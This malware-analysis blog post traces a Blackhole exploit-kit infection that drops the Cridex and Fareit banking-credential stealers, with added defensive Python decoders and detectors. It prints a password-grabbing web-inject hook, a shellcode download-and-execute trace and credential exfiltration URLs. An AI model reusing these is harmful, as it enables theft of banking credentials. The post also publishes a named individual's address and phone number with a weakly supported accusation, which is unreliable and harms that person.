I was posting these findings scattered across Twitter, VirusTotal and KernelMode (thanks to @Xylit0l for the invitation), so it is time to put them together.. And I'm advising you: making documentation is 1,000 times more important; it sucks and is time consuming, yet it is a perfect strategy to fight these moronz.

It started from a spam mail leading to a redirector page, which led us to a Blackhole (v2.01) landing page. Below are the sites:
Redirector: h00p://abyssinianflights.com/components/com_ag_google_analytics2/alert-service-citi-sign_in.html
BHEK Landing Page: h00p://eaglepointecondo.biz/detects/operation_alert_login.php

Here are the pastes of the above data: Redirector -->>[PASTEBIN], Landing Page -->>[PASTEBIN], PluginDetect BHEK2 -->>[PASTEBIN]

The landing page has a 302 protector for bad parameters:

  HTTP request sent, awaiting response... 302 Found
  Location: h00p://citibank.com [following]
  --20:24:05--  h00p://citibank.com/
             => `index.html'
  Resolving citibank.com... 192.193.103.222, 192.193.219.58
  Connecting to citibank.com|192.193.103.222|:80... connected.
  HTTP request sent, awaiting response... 301 Moved Permanently
  Location: h00ps://online.citibank.com/US/Welcome.c [following]
  h00ps://online.citibank.com/US/Welcome.c: Unsupported scheme.

I went straight to whacking the shellcode, by recoding it into:

  var a = "8282!%5185!%64c4!%44e0!%0551!%e004!%9134!...(copy-paste those moronz - code here friends)..%1414!%".split("").reverse().join("");
  x = a["replace"](/\%!/g, "%" + "u");
  document.write(x);

This will burp you the shellcode in its binary form.
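The same de-obfuscation as an added Python example (not code from the post or from MalwareMustDie): reverse the string, restore the %u escapes, and unescape them to the bytes the browser would lay out in memory. SAMPLE is a constructed input: the leading chunks quoted in the post, completed to whole "XXXX!%" chunks, which decode to the tail of the dumped shellcode.

```python
import re
import struct

# Constructed sample: the leading seven chunks quoted in the post
# ("8282!%5185!%64c4!%..."), completed to whole "XXXX!%" chunks.
# It is the tail of the real payload only, not the full shellcode.
SAMPLE = "8282!%5185!%64c4!%44e0!%0551!%e004!%9134!%"


def reverse_and_fix(obfuscated: str) -> str:
    """Step one of the landing page's own decoder: reverse the whole
    string, then turn every '%!' marker back into a '%u' escape."""
    return obfuscated[::-1].replace("%!", "%u")


def js_unescape_bytes(escaped: str) -> bytes:
    """Emulate the memory image of JavaScript unescape(): each %uXXXX
    becomes one little-endian UTF-16 code unit (two bytes), each %XX
    a single byte; any literal characters in between are copied."""
    out = bytearray()
    pos = 0
    for m in re.finditer(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", escaped):
        out += escaped[pos:m.start()].encode("latin-1")
        if m.group(1):
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += escaped[pos:].encode("latin-1")
    return bytes(out)


def decode_shellcode(obfuscated: str) -> bytes:
    """Full pipeline: reversed, marked string -> raw shellcode bytes."""
    return js_unescape_bytes(reverse_and_fix(obfuscated))


def hexdump(data: bytes, width: int = 16) -> str:
    """xxd-style listing so the result can be compared with a debugger
    or emulator view of the same buffer."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hx = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:04x}  {hx:<{width * 3}} {asc}")
    return "\n".join(lines)


if __name__ == "__main__":
    # The sample decodes to the last 14 bytes of the dumped shellcode.
    print(hexdump(decode_shellcode(SAMPLE)))
```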
Use your shellcode cracker tools or emulator libs to disassemble it. The API calls it makes:

  0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

We get the payload download URL below:

  h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p

I like to see what the server side of BHEK replied during the download:

  // my header
  GET /detects/operation_alert_login.php?of=30:1n:1i:1i:33&%20ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p HTTP/1.1
  Referer: h00p://eaglepointecondo.biz/detects/operation_alert_login.php
  User-Agent: MalwareMustDie painted logo in your EK doors
  Accept: */*
  Host: eaglepointecondo.biz
  Connection: Keep-Alive

  // replies:
  HTTP/1.1 200 OK
  Server: nginx/1.3.3
  Date: Sat, 15 Dec 2012 11:01:05 GMT
  Content-Type: application/x-msdownload
  Content-Length: 135168
  Connection: close
  X-Powered-By: PHP/5.3.14
  Pragma: public
  Expires: Sat, 15 Dec 2012 11:01:04 GMT
  Cache-Control: must-revalidate, post-check=0, pre-check=0
  Cache-Control: private
  Content-Disposition: attachment; filename="info.exe"
  Content-Transfer-Encoding: binary

Here's what the mess looks like: I was tired, so I tried to check it in some online tools and got no satisfactory result, thus VirusTotal
looks to be having a problem uploading... so I used my last energy to check it myself, as per the video below: This time I'll leave the binary analysis to you; you can use my previous post as guidance. PS: the binaries are all encrypted, so decrypting them will be a good idea! (I will add the binary analysis later on..) I go straight to the behavior test below, to capture & expose this infection:

The Cridex trojan, when executed, behaves like this: the program self-copies/drops itself to:

  %AppData%\KB000777165.exe   // which is actually the same file...

with the copy API below:

  CopyFileW(lpExistingFileName: "C:\TEST\info.exe", lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", bFailIfExists: 0x0)

Here's the proof: a self-execution trace with the API (CMD) below was found:

  lpCmdLine=C:\Documents and Settings\User\Application Data\KB00085031.exe, uCmdShow=0

It runs like this: Found interesting strings in that binary: At this point we captured the huge binary saved after an HTTP POST was sent:

  POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  Host: 74.207.237.170:8080
  Content-Length: 347
  Connection: Keep-Alive
  Cache-Control: no-cache
  // 347 bytes of encrypted POST body follow

  // With the encrypted reply as long binary data...
  Server: nginx/1.0.10
  Date: Sat, 15 Dec 2012 09:58:07 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/5.3.18-1~dotdeb.0
  Vary: Accept-Encoding
  // a chunked (first chunk 0xf3b bytes), encrypted body follows
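An added defender-side example, not part of the original post: heuristics for the traffic this page describes (the Cridex POST above, plus the stealer's :8080/asp/intro.php callbacks and the gate.php?botid=...&bank=... URL described further down) run over constructed proxy-log lines. The log format, the benign lines and the 198.51.100.x hosts are assumptions, and the path pattern is derived from the single beacon shown here, so treat it as a starting point rather than a vetted signature.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy-log lines (not a real capture), one request each:
#   <timestamp> <client> <method> <url> <bytes> "<user-agent>"
# Line 1 mirrors the Cridex POST in the post; 198.51.100.x are
# documentation-range placeholders for the stealer's callback hosts.
SAMPLE_LOG = """\
2012-12-15T09:58:07Z 10.0.0.5 POST http://74.207.237.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ 347 "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
2012-12-15T09:58:09Z 10.0.0.5 GET http://www.example.com/index.html 1204 "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
2012-12-15T10:01:12Z 10.0.0.5 POST http://198.51.100.20:8080/asp/intro.php 512 "Mozilla/4.0"
2012-12-15T10:02:40Z 10.0.0.5 GET http://198.51.100.7:8080/ipckg/gate.php?botid=BOT-ID&bank=chase 96 "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
2012-12-15T10:03:00Z 10.0.0.9 POST https://mail.example.net/owa/auth.owa 2048 "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d+) "([^"]*)"$')
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Cridex beacon path from the post: three runs of mixed-case
# alphanumerics, no file name, trailing slash.
CRIDEX_PATH = re.compile(r"^/[A-Za-z0-9]{6,12}/[A-Za-z0-9]{6,12}/[A-Za-z0-9]{6,12}/$")


def classify(method: str, url: str) -> list:
    """Return the names of every heuristic the request matches."""
    u = urlsplit(url)
    host, port, path = u.hostname or "", u.port, u.path
    hits = []
    # Cridex: POST to a bare IP on 8080 with the random three-segment path
    if (method == "POST" and port == 8080 and IP_LITERAL.match(host)
            and CRIDEX_PATH.match(path)):
        hits.append("cridex-beacon")
    # Fareit callbacks: POST to <IP>:8080/asp/intro.php
    if method == "POST" and port == 8080 and path == "/asp/intro.php":
        hits.append("fareit-callback")
    # Web-inject gate: gate.php carrying both botid= and bank= parameters
    query = parse_qs(u.query)
    if path.endswith("/gate.php") and "botid" in query and "bank" in query:
        hits.append("webinject-gate")
    return hits


def scan_log(text: str) -> list:
    """Run the heuristics over every well-formed line; unparsable lines are
    skipped. Returns (line number, client, heuristic, host:port) tuples."""
    alerts = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, method, url, _size, _ua = m.groups()
        for tag in classify(method, url):
            alerts.append((n, client, tag, urlsplit(url).netloc))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```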
And then the file below was found created in %Temp%:

  FileName: exp2.tmp.exe
  TimeStamp: 2012/12/15 18:58
  Size: 122,880
  MD5: ce7474646297ed818bb8ed48f50c7e1e

The file looks like this: And THEN... the new process exp2.tmp.exe started: Up to this point we know that KB00085031.exe downloads exp2.tmp.exe. Currently, only one key was added in the registry. It is an autostart for KB00085031.exe:

  HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: ""C:\Documents and Settings\%%UserName\Application Data\KB00777165.exe""

Network activity
At this point, exp2.tmp.exe was making a hell of a lot of connections; I recorded them in Wireshark as per the summary below, full data is here --->>[PASTEBIN]

  (323): try to connect to 132.248.49.112
  (335): DNS requests to... 112.49.248.132.in-addr.arpa web.ecologia.unam.mx 77.65.130.113.in-addr.arpa ns.shinbiro.com..domain
  (360): Communicating via HTTP/POST to 203.113.98.131:80
  (385): ***** At this point the malware process exp2.tmp.exe was started....
  (394): try to establish conn to 74.207.237.170
  (399): send ping to 209.190.61.50
  (405): Communicating via HTTP/POST to 174.143.174.136:8080
  (461): try to establish conn to 199.71.215.194
  (467): Communicating via HTTP/POST to 210.56.23.100:8080
  (495): try to establish conn to 132.248.49.112
  (500): try to establish conn to 74.117.61.66
  (535): try to establish conn to 173.192.229.36
  (541): Communicating via HTTP/POST to 69.64.89.82:8080
  (571): try to establish conn to 173.224.221.135
  (577): try to establish conn to 59.90.221.6
  (583): try to establish conn to 180.235.150.72
  (588): Communicating via HTTP/POST to 123.49.61.59:8080
  (641): Communicating via HTTP/POST to 123.49.61.59:8080
  (716): try to establish conn to 113.130.65.77
  (721): try to establish conn to 180.235.150.72
  (726): Communicating via HTTP/POST to 69.64.89.82:8080

Mr. EP_X0FF, the Global Moderator of KernelInfo, was cracking the code to find all the connection possibilities: a list of 13 C2 servers, each an IP address on port 8080, together with the list of callbacks, 13 more IP addresses, each at :8080/asp/intro.php.

File activity
At its first run, exp2.tmp.exe makes your PC very slow, because it searches every possible path for data to steal. VirusTotal makes a good behavioral file-access list here -->>[PASTEBIN]. Snipped here:

  \\.\PIPE\lsarpc (successful)
  C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed)
  C:\WINDOWS\wcx_ftp.ini (failed)
  C:\Documents and Settings\ \wcx_ftp.ini (failed)
  C:\Documents and Settings\ \Application Data\GHISLER\wcx_ftp.ini (failed)
  C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed)
  C:\Documents and Settings\ \Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed)
  C:\Documents and Settings\ \Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
  C:\Documents and Settings\ \Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
  C:\Documents and Settings\ \Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)

The Password Stealer Configurator
At this point in your registry, at the key below:

  HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\SD5809E24(←random)\

a long string of hex bytes was saved. Save that as binary with a .txt filename & you'll see this malware config in text: you'll see the bank/case online sites, each connection with the credential path, and also some public https or ftp sites.
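An added Python example, not from the original post, of the step just described: turn the hex dump of the registry value back into bytes and pull the triage-relevant fields (URL filters, inject targets, the injected gate URL and its host) out of the config. CONFIG_XML is a constructed stand-in that reuses the element names of the real config; 198.51.100.7 is a placeholder, not the real gate host.

```python
import re
from urllib.parse import urlsplit

HEX_TOKEN = re.compile(r"^[0-9A-Fa-f]{2}$")

def to_hex_dump(data: bytes, width: int = 16) -> str:
    """Render bytes as the registry viewer showed them: hex pairs, 16 a line."""
    rows = (data[i:i + width] for i in range(0, len(data), width))
    return "\n".join(" ".join(f"{b:02X}" for b in row) for row in rows)

def hex_dump_to_bytes(dump: str) -> bytes:
    """Rebuild the raw value from a hex dump. Tokens that are not two hex
    digits (e.g. the ':' snip marker in the post) are skipped, so a partial
    dump still decodes as far as it goes."""
    return bytes(int(t, 16) for t in dump.split() if HEX_TOKEN.match(t))

def parse_stealer_config(text: str) -> dict:
    """Pull the triage-relevant fields out of the decoded config. Regexes
    rather than an XML parser: the injected HTML inside the blob is not
    guaranteed to be well-formed."""
    cfg = {"hash": None, "httpshots": [], "inject_targets": [],
           "inject_scripts": [], "c2_hosts": []}
    m = re.search(r'<settings\s+hash="([^"]*)"', text)
    if m:
        cfg["hash"] = m.group(1)
    shots = re.search(r"<httpshots>(.*?)</httpshots>", text, re.S)
    if shots:  # (attribute, attribute value, regex) per URL filter
        cfg["httpshots"] = re.findall(
            r'<url\s+(\w+)="([^"]*)">(.*?)</url>', shots.group(1), re.S)
    for inject in re.findall(r"<httpinject>(.*?)</httpinject>", text, re.S):
        cond = re.search(r"<conditions>(.*?)</conditions>", inject, re.S)
        if cond:  # which bank pages the inject fires on
            cfg["inject_targets"] += re.findall(
                r"<url[^>]*>(.*?)</url>", cond.group(1), re.S)
        for src in re.findall(r'<replacement>.*?src="([^"]+)"', inject, re.S):
            cfg["inject_scripts"].append(src)
            host = urlsplit(src).netloc  # host:port the stolen data goes to
            if host and host not in cfg["c2_hosts"]:
                cfg["c2_hosts"].append(host)
    return cfg

def decode_registry_dump(dump: str) -> dict:
    """Hex dump of the registry value -> parsed config, in one step."""
    return parse_stealer_config(hex_dump_to_bytes(dump).decode("latin-1"))

# Constructed stand-in for the decoded web-inject config: same element
# names as the real one, 198.51.100.7 is a documentation-range placeholder
# for the real gate host, and the regexes are illustrative.
CONFIG_XML = (
    '<settings hash="0123456789abcdef"><httpshots>'
    '<url type="deny">\\.(css|js)($|\\?)</url>'
    '<url contentType="^text/(html|plain)">/ach/</url>'
    '</httpshots><httpinjects><httpinject>'
    '<conditions><url type="allow">chase\\.com/</url></conditions>'
    '<actions><modify><pattern><![CDATA[<body.*?>(.*?)]]></pattern>'
    '<replacement><![CDATA[<script type="text/javascript" '
    'src="http://198.51.100.7:8080/ipckg/gate.php?botid=BOT-ID&bank=chase">'
    '</script>]]></replacement></modify></actions></httpinject>'
    '</httpinjects></settings>'
)
# What the analyst copies out of the registry viewer (constructed).
HEX_DUMP = to_hex_dump(CONFIG_XML.encode("latin-1"))
```

Run `decode_registry_dump(HEX_DUMP)` to get the parsed fields; feeding it a partial dump with ':' snip lines still yields whatever filters and URLs survive in the decoded part.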
I saved the data here -->>[PASTEBIN]. Thanks again to Mr. EP_X0FF, the Global Moderator of KernelInfo, who listed all of the software & credential paths sought, here -->>[PASTEBIN]. I counted 491 types of credentials being sought..

Back to this stealer configuration file: it handles the encryption done before the form is sent by the POST method, by wrapping window.EncryptPassword so the value is copied into a hidden field (OPN) first:

  if (typeof window.EncryptPassword == 'function') {
      var fn = window.EncryptPassword;
      window.EncryptPassword = function(id) {
          try {
              var e = document.getElementById(id);
              var i = document.createElement("input");
              i.type = "hidden";
              i.name = "OPN";
              i.value = e.value;
              document.Form1.appendChild(i);
          } catch (e) {}
          return fn(id);
      };
  }

There is also phishing for the credit card/online banking trap; the code is in the stealer configuration, something like this snippet:

  :
  <span class="bodytext"> Click "Next" to complete Identity verification process. </span>
  <!-- END of art_SA_edu_edu_instr in DCTM ECP -->
  </td> </tr>
  <tr> <td colspan="2"> </td> </tr>
  <tr> <td> </td> <td> <span class="bodytext"> <label title="Go to Enter Card"> </label> </span> </td> </tr>
  <tr> <td colspan="2"> </td>
  :

I just saved the configuration data into HTML & ran it as a PoC, saved as teststealer.html: See the path & filename well.. Then here we go... Hello American Express! Good Day Chase Bank! From what I confirmed in the configuration code, it sends stolen credentials to:

  h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=chase
  h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=wellsfargo
  h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=bankofamerica

Virus Total Detection Ratio
It's been more than 24 hrs since I detected these messes; after the 1st disclosure here and there, let's see the detection ratio of these infectors below:

The landing page:
  SHA1: 35d9f1481132d8f1abdc1b2d3aa56cd1455f6656
  MD5: a93bb29d6a3c3c04b1cb3dafc7cfc79f
  File size: 90.1 KB ( 92310 bytes )
  File name: operation_alert_login.php
  File type: HTML
  Detection ratio: 6 / 46
  Analysis date: 2012-12-16 06:22:39 UTC ( 1 min ago )
  URL -->>[CLICK]
  Malware names:
    McAfee-GW-Edition : JS/Exploit-Blacole.gq
    NANO-Antivirus : Trojan.Script.Expack.bcrxpa
    McAfee : JS/Exploit-Blacole.gq
    Fortinet : JS/Obfuscus.AACB!tr
    TheHacker : JS/Feebs.gen@MM
    AVG : JS/Redir

The Cridex trojan, the password stealer's downloader:
  SHA1: d4bfbbd375da0ac775812bed2459ff908e1fb9ba
  MD5: b360fec7652688dc9215fd366530d40c
  File size: 132.0 KB ( 135168 bytes )
  File name: info.exe
  File type: Win32 EXE
  Tags: peexe
  Detection ratio: 26 / 45
  Analysis date: 2012-12-16 01:28:28 UTC ( 5 hours, 5 min ago )
  URL -->>[CLICK]
  Malware names:
    MicroWorld-eScan : Trojan.Generic.KD.810285
    McAfee : pws-ja!cm
    Malwarebytes : Trojan.FakeMS
    Symantec : W32.Cridex
    Norman : W32/Suspicious_Gen4.BTZMQ
    ESET-NOD32 : a variant of Win32/Kryptik.AQNJ
    TrendMicro-HouseCall : TROJ_GEN.RCBCDLE
    Avast : Win32:Dropper-MEA [Drp]
    Kaspersky : Trojan.Win32.Bublik.wad
    BitDefender : Trojan.Generic.KD.810285
    Emsisoft : Trojan.Win32.Agent.AMN (A)
    Comodo : TrojWare.Win32.Trojan.Agent.Gen
    F-Secure : Trojan.Generic.KD.810285
    DrWeb : Trojan.Necurs.97
    VIPRE : Win32.Malware!Drop
    AntiVir : TR/Bublik.wad
    McAfee-GW-Edition : pws-ja!cm
    Sophos : Troj/Agent-ZIT
    Microsoft : Worm:Win32/Cridex.E
    ViRobot : Trojan.Win32.A.Bublik.135168.S
    GData : Trojan.Generic.KD.810285
    PCTools : Malware.Cridex
    Ikarus : Trojan-Spy.Agent
    Fortinet : W32/Bublik.WAD!tr
    AVG : Generic30.BIMO
    Panda : Trj/Sinowal.WWG

The password stealer (Fareit) trojan:
  SHA1: 88bab6d7c0e98b1ee55110243251f562af399854
  MD5: ce7474646297ed818bb8ed48f50c7e1e
  File size: 120.0 KB ( 122880 bytes )
  File name: exp2.tmp.ex_
  File type: Win32 EXE
  Tags: peexe
  Detection ratio: 7 / 46
  Analysis date: 2012-12-16 01:13:52 UTC ( 5 hours, 6 min ago )
  URL -->>[CLICK]
  Malware names:
    DrWeb : Trojan.PWS.Stealer.1656
    VIPRE : Trojan.Win32.Kryptik.alry (v)
    Emsisoft : Trojan.PSW.Win32.Tepfer.dazd.AMN (A)
    Kaspersky : Trojan-PSW.Win32.Tepfer.dazd
    Malwarebytes : Trojan.PWS
    Kingsoft : Win32.Malware.Generic.a.(kcloud)
    ViRobot : Trojan.Win32.A.PSW-Tepfer.122880.A

We can see that the landing page & the password stealer (Fareit) STILL have low detection.

Samples
For the good guys, the samples & captured data are available.
  Samples --->>[HERE]
  Research Data (PCAP, RegShot) -->>[HERE]
  Cracked Data (deobfuscated code, decrypted binaries (thanks to kernelmode!), etc) -->>[HERE]

Thanks to...
To all MalwareMustDie friends! Without you guys, I wouldn't have made it this far :-) Blake (jsunpack), for inspiring the stealer configuration file. @Xylit0l & EP_X0FF of kernelmode, great thanks! YouTube, VirusTotal, MediaFire, Google & Blogger.

Network Analysis.. Tracing the Bad guys..
As requested, I investigated the NS used, which leads to someone.. Please bear with my text since I posted it via FreeBSD, below:

// The domain used for the infector is:
eaglepointecondo.biz  900  IN  A  59.57.247.185
// ↑ This is aiming at the US for sure (see the bank list, 75% are US banks)

// The SOA that was used (mark the TTL refresh time..):
primary name server = ns1.amishshoppe.net
responsible mail addr = (root)
serial  = 1355645102
refresh = 60 (1 min)
retry   = 120 (2 mins)
expire  = 1048576 (12 days 3 hours 16 mins 16 secs)
default TTL = 900 (15 mins)   // ← this!

// How it was root'ed:
Tracing to eaglepointecondo.biz[a] via 202.238.95.24, maximum of 1 retries
202.238.95.24 (202.238.95.24)
 |\___ a.gtld.biz [biz] (156.154.124.65)
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
 |\___ k.gtld.biz [biz] (156.154.128.65)
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
 |\___ f.gtld.biz [biz] (209.173.58.66)
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
 |\___ c.gtld.biz [biz] (156.154.127.65)
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
 |\___ b.gtld.biz [biz] (156.154.125.65)
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *
  \___ e.gtld.biz [biz] (156.154.126.65)
       |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer
        \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) *

// History of infectors from 59.57.247.185 leads to:
eaglepointecondo.org                      A  59.57.247.185
pleansantwille.com                        A  59.57.247.185
eaglepointecondo.co                       A  59.57.247.185
platinumbristol.net                       A  59.57.247.185
eaglepointecondo.biz                      A  59.57.247.185
sessionid0147239047829578349578239077.pl  A  59.57.247.185

// It uses a Chinese IP:
ASN  | Prefix       | ASName   | CN | Domain   | ISP of an IP Address
4134 | 59.56.0.0/14 | CHINANET | CN | XMJL.COM | XIAMEN JINLONGLVXINGCHE FUJIAN PROVINCE

// PoC of this IP's infections as additional evidence:
http://urlquery.net/search.php?q=59.57.247.185&type=string&start=2012-12-01&end=2012-12-16&max=300

// These moronz are using the DNS below:
ns1.amishshoppe.net.  3600  IN  A  209.140.18.37
ns2.amishshoppe.net.  3600  IN  A  211.27.42.138

// Those DNS servers are in the US & Australia (should report this malicious use..):
ASN   | Prefix          | ASName              | CN | Domain        | ISP of an IP Address
11042 | 209.140.16.0/22 | LANDIS-HOLDINGS-INC | US | NOCDIRECT.COM | LANDIS HOLDINGS INC
9443  | 211.27.32.0/20  | INTERNETPRIMUS-AS   | AU | PRIMUSTEL.COM | PRIMUS TELECOMMUNICATIONS

// Looks like they have full control of the domain amishshoppe.net to control the DNS. PoC:
; <<>> DiG 9.8.1-P1 <<>> 209.140.18.37 axfr
;; global options: +cmd
; Transfer failed.
; <<>> DiG 9.8.1-P1 <<>> 211.27.42.138 axfr
;; global options: +cmd
; Transfer failed.
// Voila! No AXFR allowed, which means the NS must have been added directly.

// This infector in WHOIS:
Domain Name: EAGLEPOINTECONDO.BIZ
Domain ID: D52418387-BIZ
Sponsoring Registrar: GODADDY.COM, INC.
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Created by Registrar: GODADDY.COM, INC.
Last Updated by Registrar: GODADDY.COM, INC.
Domain Registration Date: Sat Dec 08 00:22:13 GMT 2012
Domain Expiration Date: Sat Dec 07 23:59:59 GMT 2013
Domain Last Updated Date: Mon Dec 10 19:12:41 GMT 2012
// VIA strange proxy services....
Registrant Organization: Domains By Proxy, LLC
Registrant Address1: DomainsByProxy.com
Registrant Address2: 14747 N Northsight Blvd Suite 111, PMB 309
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.4806242599
Registrant Facsimile Number: +1.4806242598

// Some must start questioning Mr. Steve Burandt in the US about this infection...
Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012   // <== JUST UPDATED!! #PoC Proved!! #w00t!
Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013
Registrant:
  Steve Burandt
  0n430 Peter Rd
  Winfield, IL 60190
  US
  Phone: +1.6304626711
  Email: solaradvent@yahoo.com

↑ A strong accusation, I know, but the data says so.. Can't wait to hear the explanation from this person..
#MalwareMustDie!